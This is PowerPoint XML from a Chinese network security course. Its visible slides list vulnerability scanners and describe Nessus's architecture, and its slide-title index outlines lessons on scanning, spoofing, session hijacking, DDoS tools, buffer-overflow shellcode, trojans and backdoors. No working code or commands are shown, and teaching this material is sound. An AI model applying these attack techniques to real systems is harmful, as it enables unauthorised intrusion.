              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cisco Auditing Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>集成化的漏洞扫描器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Nessus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Shadow Security Scanner </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>eEye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Retina </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Internet Security Scanner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>GFI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>LANguard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>专业</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫描软件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IBM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>appscan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Acunetix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> Web Vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据库漏洞扫描器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ISS Database Scanner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>oscanner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	Oracle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据库扫描器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Metacoretex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据安全审计工具</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞扫描工具</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98</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3856272025"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Nessus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>构架</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器端：基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>客户端：有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>GTK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Win</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统支持</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>运作</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>客户端连接服务器端，并下载插件和扫描策略</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>真正的扫描由服务器端发起</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>两者之间的通信通过加密认证</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>优势：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>具有强大的插件功能</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>完全免费，升级快速</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>非常适合作为网络安全评估工具</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166914" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞扫描工具</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166916"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6917"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EF0B901-A7F2-49BE-B5D3-25C780B68F0B}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
              <a:t>99</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1000" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9933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7563" y="1520825"/>
            <a:ext cx="6281737"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99</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4059739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9334"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="99334"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="99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sea</Template>
  <TotalTime>23253</TotalTime>
  <Words>22410</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>3555</Paragraphs>
  <Slides>282</Slides>
  <Notes>161</Notes>
  <HiddenSlides>33</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7</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>幻灯片标题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>282</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="311" baseType="lpstr">
      <vt:lpstr>ZapfDingbats</vt:lpstr>
      <vt:lpstr>方正舒体</vt:lpstr>
      <vt:lpstr>仿宋_GB2312</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>华文行楷</vt:lpstr>
      <vt:lpstr>华文隶书</vt:lpstr>
      <vt:lpstr>楷体_GB2312</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>幼圆</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Comic Sans MS</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Lucida Sans Unicode</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>sea</vt:lpstr>
      <vt:lpstr>Visio</vt:lpstr>
      <vt:lpstr>Document</vt:lpstr>
      <vt:lpstr>Clip</vt:lpstr>
      <vt:lpstr>位图图像</vt:lpstr>
      <vt:lpstr>Bitmap Image</vt:lpstr>
      <vt:lpstr>BMP 图象</vt:lpstr>
      <vt:lpstr>Photo Editor Photo</vt:lpstr>
      <vt:lpstr>第二章</vt:lpstr>
      <vt:lpstr>威胁与攻击分类</vt:lpstr>
      <vt:lpstr>安全威胁分类 </vt:lpstr>
      <vt:lpstr>安全攻击方式（从信息流动的角度）</vt:lpstr>
      <vt:lpstr>攻击的种类</vt:lpstr>
      <vt:lpstr>被动攻击——受害者难感知</vt:lpstr>
      <vt:lpstr>主动攻击——受害者易感知</vt:lpstr>
      <vt:lpstr>物理临近</vt:lpstr>
      <vt:lpstr>内部人员攻击</vt:lpstr>
      <vt:lpstr>软硬件配置攻击</vt:lpstr>
      <vt:lpstr>其他分类方法</vt:lpstr>
      <vt:lpstr>Resources and their Vulnerabilities</vt:lpstr>
      <vt:lpstr>资源与威胁</vt:lpstr>
      <vt:lpstr>Security Threats</vt:lpstr>
      <vt:lpstr>安全威胁分级</vt:lpstr>
      <vt:lpstr>攻击环节及步骤</vt:lpstr>
      <vt:lpstr>攻击环节</vt:lpstr>
      <vt:lpstr>时间——漏洞窗口 </vt:lpstr>
      <vt:lpstr>地点——攻击的位置</vt:lpstr>
      <vt:lpstr>在Internet上</vt:lpstr>
      <vt:lpstr>在局域网上</vt:lpstr>
      <vt:lpstr>在本地</vt:lpstr>
      <vt:lpstr>离线</vt:lpstr>
      <vt:lpstr>人物——攻击者身份与攻击目的</vt:lpstr>
      <vt:lpstr>手段——常见的攻击方法</vt:lpstr>
      <vt:lpstr>目标——容易遭受攻击的目标</vt:lpstr>
      <vt:lpstr>入侵系统的常用步骤</vt:lpstr>
      <vt:lpstr>较高明（细化）的入侵步骤</vt:lpstr>
      <vt:lpstr>温故而知新——安全服务的部署</vt:lpstr>
      <vt:lpstr>温故而知新——网络安全策略（模型）</vt:lpstr>
      <vt:lpstr>温故而知新——安全威胁分类 </vt:lpstr>
      <vt:lpstr>温故而知新——攻击环节</vt:lpstr>
      <vt:lpstr>攻击的过程</vt:lpstr>
      <vt:lpstr>攻击的一般过程及目的、内容</vt:lpstr>
      <vt:lpstr>黑客攻击策略步骤</vt:lpstr>
      <vt:lpstr>信息收集、目标分析</vt:lpstr>
      <vt:lpstr>信息收集、目标分析的方式、手段</vt:lpstr>
      <vt:lpstr>域名与IP查询</vt:lpstr>
      <vt:lpstr>Ping原理</vt:lpstr>
      <vt:lpstr>Ping命令行参数</vt:lpstr>
      <vt:lpstr>Windows平台ping工具</vt:lpstr>
      <vt:lpstr>ping扫描预防措施</vt:lpstr>
      <vt:lpstr>Traceroute 路由跟踪原理</vt:lpstr>
      <vt:lpstr>Traceroute 路由跟踪原理</vt:lpstr>
      <vt:lpstr>Traceroute 路由跟踪原理</vt:lpstr>
      <vt:lpstr>Traceroute 路由跟踪原理</vt:lpstr>
      <vt:lpstr>netcraft.com </vt:lpstr>
      <vt:lpstr>端口、服务分析</vt:lpstr>
      <vt:lpstr>公开信息的分析</vt:lpstr>
      <vt:lpstr>搜索引擎</vt:lpstr>
      <vt:lpstr>社交工程攻击——电话访问</vt:lpstr>
      <vt:lpstr>社交工程——信任欺骗</vt:lpstr>
      <vt:lpstr>网络扫描器</vt:lpstr>
      <vt:lpstr>网络扫描器</vt:lpstr>
      <vt:lpstr>网络扫描器的主要功能</vt:lpstr>
      <vt:lpstr>扫描器的基本工作原理</vt:lpstr>
      <vt:lpstr>网络扫描的主要技术</vt:lpstr>
      <vt:lpstr>主机扫描技术－传统技术</vt:lpstr>
      <vt:lpstr>ICMP echo与sweep扫描</vt:lpstr>
      <vt:lpstr>Broadcast ICMP扫描</vt:lpstr>
      <vt:lpstr>Non-Echo ICMP扫描</vt:lpstr>
      <vt:lpstr>主机扫描技术－高级技术</vt:lpstr>
      <vt:lpstr>温故而知新——主机扫描</vt:lpstr>
      <vt:lpstr>异常IP包头</vt:lpstr>
      <vt:lpstr>在IP头中设置无效的字段值</vt:lpstr>
      <vt:lpstr>错误数据分片</vt:lpstr>
      <vt:lpstr>通过超长包探测内部路由器</vt:lpstr>
      <vt:lpstr>反向映射探测</vt:lpstr>
      <vt:lpstr>端口扫描</vt:lpstr>
      <vt:lpstr>温故而知新——攻击的过程</vt:lpstr>
      <vt:lpstr>黑客攻击策略步骤</vt:lpstr>
      <vt:lpstr>端口扫描类型</vt:lpstr>
      <vt:lpstr>TCP三次握手机制</vt:lpstr>
      <vt:lpstr>开放扫描TCP Connect 扫描</vt:lpstr>
      <vt:lpstr>开放扫描TCP Connect 扫描</vt:lpstr>
      <vt:lpstr>半开放扫描TCP SYN 扫描</vt:lpstr>
      <vt:lpstr>其他扫描技术</vt:lpstr>
      <vt:lpstr>TCP连接的终止</vt:lpstr>
      <vt:lpstr>TCP FIN 扫描</vt:lpstr>
      <vt:lpstr>其他TCP隐蔽扫描</vt:lpstr>
      <vt:lpstr>UDP 端口扫描</vt:lpstr>
      <vt:lpstr>温故而知新——扫描器的基本工作原理</vt:lpstr>
      <vt:lpstr>温故而知新——端口扫描类型</vt:lpstr>
      <vt:lpstr>端口扫描策略</vt:lpstr>
      <vt:lpstr>工具介绍-端口扫描</vt:lpstr>
      <vt:lpstr>工具介绍-端口扫描</vt:lpstr>
      <vt:lpstr>操作系统识别</vt:lpstr>
      <vt:lpstr>OS识别依据</vt:lpstr>
      <vt:lpstr>OS识别依据</vt:lpstr>
      <vt:lpstr>OS识别技术</vt:lpstr>
      <vt:lpstr>操作系统识别</vt:lpstr>
      <vt:lpstr>主动协议栈指纹识别</vt:lpstr>
      <vt:lpstr>被动协议栈指纹识别</vt:lpstr>
      <vt:lpstr>系统鉴别-ICMP堆栈指纹技术</vt:lpstr>
      <vt:lpstr>漏洞扫描</vt:lpstr>
      <vt:lpstr>漏洞扫描方法</vt:lpstr>
      <vt:lpstr>入侵-多种多样的入侵方式</vt:lpstr>
      <vt:lpstr>漏洞扫描工具</vt:lpstr>
      <vt:lpstr>漏洞扫描工具</vt:lpstr>
      <vt:lpstr>漏洞扫描工具</vt:lpstr>
      <vt:lpstr>web扫描工具</vt:lpstr>
      <vt:lpstr>Acunetix Web Vulnerability Scanner</vt:lpstr>
      <vt:lpstr>获取目标主机的一般权限</vt:lpstr>
      <vt:lpstr>获取目标主机的管理权限</vt:lpstr>
      <vt:lpstr>隐藏自己的行踪</vt:lpstr>
      <vt:lpstr>后门-方便下次进入</vt:lpstr>
      <vt:lpstr>网络接口层安全威胁 </vt:lpstr>
      <vt:lpstr>链路层协议的安全威胁</vt:lpstr>
      <vt:lpstr>网络监听（Sniffer） </vt:lpstr>
      <vt:lpstr>Sniffer网络环境</vt:lpstr>
      <vt:lpstr>集线器－Hub</vt:lpstr>
      <vt:lpstr>集线器内部逻辑结构</vt:lpstr>
      <vt:lpstr>共享式网络监听原理</vt:lpstr>
      <vt:lpstr>Ethernet交换机</vt:lpstr>
      <vt:lpstr>交换机交换机制</vt:lpstr>
      <vt:lpstr>交换式网络监听原理</vt:lpstr>
      <vt:lpstr>交换机毒化攻击</vt:lpstr>
      <vt:lpstr>地址解析协议ARP</vt:lpstr>
      <vt:lpstr>地址解析协议ARP</vt:lpstr>
      <vt:lpstr>温故而知新——操作系统识别</vt:lpstr>
      <vt:lpstr>温故而知新——链路层协议的安全威胁</vt:lpstr>
      <vt:lpstr>温故而知新——共享式网络监听原理</vt:lpstr>
      <vt:lpstr>地址解析协议ARP</vt:lpstr>
      <vt:lpstr>ARP工作过程</vt:lpstr>
      <vt:lpstr>地址解析协议工作示例</vt:lpstr>
      <vt:lpstr>ARP协议存在的问题</vt:lpstr>
      <vt:lpstr>地址解析协议的安全威胁</vt:lpstr>
      <vt:lpstr>ARP欺骗</vt:lpstr>
      <vt:lpstr>ARP欺骗——假冒攻击</vt:lpstr>
      <vt:lpstr>ARP欺骗问题的原因：</vt:lpstr>
      <vt:lpstr>ARP欺骗的局限性</vt:lpstr>
      <vt:lpstr>Arp 欺骗的危害</vt:lpstr>
      <vt:lpstr>IP协议与ICMP协议安全威胁</vt:lpstr>
      <vt:lpstr>网络层协议的安全威胁</vt:lpstr>
      <vt:lpstr>IP协议</vt:lpstr>
      <vt:lpstr>IP欺骗</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>双向IP欺骗</vt:lpstr>
      <vt:lpstr>IP欺骗实现方式</vt:lpstr>
      <vt:lpstr>源IP伪造或盗用</vt:lpstr>
      <vt:lpstr>用程序实现IP欺骗</vt:lpstr>
      <vt:lpstr>截获响应数据包</vt:lpstr>
      <vt:lpstr>IP欺骗对策</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>传输层协议的安全威胁</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>会话(交易)劫持</vt:lpstr>
      <vt:lpstr>TCP会话劫持(session hijacking)</vt:lpstr>
      <vt:lpstr>TCP会话劫持</vt:lpstr>
      <vt:lpstr>会话劫持示意图</vt:lpstr>
      <vt:lpstr>会话劫持的原理</vt:lpstr>
      <vt:lpstr>实施会话劫持的一般性过程</vt:lpstr>
      <vt:lpstr>进行会话劫持的工具</vt:lpstr>
      <vt:lpstr>如何防止会话劫持</vt:lpstr>
      <vt:lpstr>拒绝服务攻击</vt:lpstr>
      <vt:lpstr>拒绝服务攻击</vt:lpstr>
      <vt:lpstr>拒绝服务(Denial of Service)</vt:lpstr>
      <vt:lpstr>DOS的基本模式</vt:lpstr>
      <vt:lpstr>DOS的基本模式 ——(1) 资源耗尽型</vt:lpstr>
      <vt:lpstr>DOS的基本模式</vt:lpstr>
      <vt:lpstr>DOS的基本模式</vt:lpstr>
      <vt:lpstr>DOS攻击的基本形式</vt:lpstr>
      <vt:lpstr>DOS攻击的基本形式</vt:lpstr>
      <vt:lpstr>DOS攻击的基本形式</vt:lpstr>
      <vt:lpstr>拒绝服务攻击的本质与形式</vt:lpstr>
      <vt:lpstr>典型DoS攻击</vt:lpstr>
      <vt:lpstr>Land——自握手</vt:lpstr>
      <vt:lpstr>ping of death</vt:lpstr>
      <vt:lpstr>ping of death防御：</vt:lpstr>
      <vt:lpstr>Tear drop</vt:lpstr>
      <vt:lpstr>SYN Flood（IP欺骗）</vt:lpstr>
      <vt:lpstr>SYN Flood(大量请求)</vt:lpstr>
      <vt:lpstr>Smurf（反射攻击）</vt:lpstr>
      <vt:lpstr>Smurf攻击示意图</vt:lpstr>
      <vt:lpstr>Fraggle攻击 </vt:lpstr>
      <vt:lpstr>典型DOS防御</vt:lpstr>
      <vt:lpstr>DoS防御策略</vt:lpstr>
      <vt:lpstr>DDOS产生的背景</vt:lpstr>
      <vt:lpstr>DDOS定义</vt:lpstr>
      <vt:lpstr>DDOS攻击过程</vt:lpstr>
      <vt:lpstr>分布式拒绝服务攻击(DDoS)</vt:lpstr>
      <vt:lpstr>分布式拒绝服务攻击(DDoS)</vt:lpstr>
      <vt:lpstr>DDoS攻击常用方式</vt:lpstr>
      <vt:lpstr>Trinoo（Tribe Flood Network）</vt:lpstr>
      <vt:lpstr>TFN攻击</vt:lpstr>
      <vt:lpstr>TFN2K</vt:lpstr>
      <vt:lpstr>Stacheldraht</vt:lpstr>
      <vt:lpstr>SHAFT </vt:lpstr>
      <vt:lpstr>DDoS的防范——技术方面 </vt:lpstr>
      <vt:lpstr>DDoS的防范——管理方面 </vt:lpstr>
      <vt:lpstr>系统或网络管理员</vt:lpstr>
      <vt:lpstr>系统或网络管理员 2）网络设备上的设置</vt:lpstr>
      <vt:lpstr>ISP、ICP管理员</vt:lpstr>
      <vt:lpstr>骨干网络运营商</vt:lpstr>
      <vt:lpstr>应用层 DDOS</vt:lpstr>
      <vt:lpstr>应用层 DDOS防御</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>应用层安全威胁</vt:lpstr>
      <vt:lpstr>DNS欺骗（域名劫持）</vt:lpstr>
      <vt:lpstr>DNS欺骗（域名劫持）步骤</vt:lpstr>
      <vt:lpstr>电子邮件欺骗</vt:lpstr>
      <vt:lpstr>电子邮件欺骗：使用类似的地址</vt:lpstr>
      <vt:lpstr>帐户配置</vt:lpstr>
      <vt:lpstr>邮件欺骗：直接连接smtp服务器</vt:lpstr>
      <vt:lpstr>邮件欺骗的保护</vt:lpstr>
      <vt:lpstr>Web欺骗</vt:lpstr>
      <vt:lpstr>使用类似的域名</vt:lpstr>
      <vt:lpstr>站点欺骗技术</vt:lpstr>
      <vt:lpstr>伪造、诱骗、掩盖</vt:lpstr>
      <vt:lpstr>网络钓鱼phishing</vt:lpstr>
      <vt:lpstr>改写URL及页面</vt:lpstr>
      <vt:lpstr>Web会话劫持</vt:lpstr>
      <vt:lpstr>攻击步骤     </vt:lpstr>
      <vt:lpstr>攻击者获取SessionID的方式</vt:lpstr>
      <vt:lpstr>Web会话劫持</vt:lpstr>
      <vt:lpstr>防止Web欺骗</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>缓冲区溢出及基本概念</vt:lpstr>
      <vt:lpstr>缓冲区溢出示例</vt:lpstr>
      <vt:lpstr>缓冲区溢出攻击</vt:lpstr>
      <vt:lpstr>缓冲区溢出攻击危害性</vt:lpstr>
      <vt:lpstr>缓冲区溢出攻击的内存模型</vt:lpstr>
      <vt:lpstr>堆栈示意图</vt:lpstr>
      <vt:lpstr>函数调用时堆栈状况</vt:lpstr>
      <vt:lpstr>函数调用时堆栈状况</vt:lpstr>
      <vt:lpstr>栈溢出攻击的原理</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>常见的情形</vt:lpstr>
      <vt:lpstr>如何能够进行系统调用？</vt:lpstr>
      <vt:lpstr>温故而知新——栈溢出攻击的原理</vt:lpstr>
      <vt:lpstr>缓冲区溢出攻击 步骤</vt:lpstr>
      <vt:lpstr>攻击代码安排</vt:lpstr>
      <vt:lpstr>控制流程转移方法</vt:lpstr>
      <vt:lpstr>综合代码植入和流程控制</vt:lpstr>
      <vt:lpstr>栈溢出攻击示例</vt:lpstr>
      <vt:lpstr>Linux系统下的栈溢出攻击</vt:lpstr>
      <vt:lpstr>NSR溢出模式</vt:lpstr>
      <vt:lpstr>RNS溢出模式</vt:lpstr>
      <vt:lpstr>R.S溢出模式－利用环境变量</vt:lpstr>
      <vt:lpstr>Shellcode C版本</vt:lpstr>
      <vt:lpstr>Shellcode 汇编版本</vt:lpstr>
      <vt:lpstr>Shellcode Opcode（反汇编）版本</vt:lpstr>
      <vt:lpstr>缓冲区溢出原理</vt:lpstr>
      <vt:lpstr>正常函数返回流程</vt:lpstr>
      <vt:lpstr>溢出函数返回流程</vt:lpstr>
      <vt:lpstr>溢出(控制流程)+植入代码(攻击)流程</vt:lpstr>
      <vt:lpstr>温故而知新——缓冲区溢出攻击</vt:lpstr>
      <vt:lpstr>温故而知新——函数调用时堆栈状况</vt:lpstr>
      <vt:lpstr>防范缓冲区溢出攻击</vt:lpstr>
      <vt:lpstr>防范缓冲区溢出攻击</vt:lpstr>
      <vt:lpstr>恶意代码</vt:lpstr>
      <vt:lpstr>恶意代码</vt:lpstr>
      <vt:lpstr>恶意代码的分类</vt:lpstr>
      <vt:lpstr>恶意代码的分类（续）</vt:lpstr>
      <vt:lpstr>各种恶意代码融合趋势</vt:lpstr>
      <vt:lpstr>木马（Trojan）</vt:lpstr>
      <vt:lpstr>木马的伪装方法</vt:lpstr>
      <vt:lpstr>木马示例</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>特洛伊木马加载及启动方式</vt:lpstr>
      <vt:lpstr>加载方式－启动文件</vt:lpstr>
      <vt:lpstr>加载方式－注册表</vt:lpstr>
      <vt:lpstr>加载方式－服务</vt:lpstr>
      <vt:lpstr>加载方式－修改文件关联</vt:lpstr>
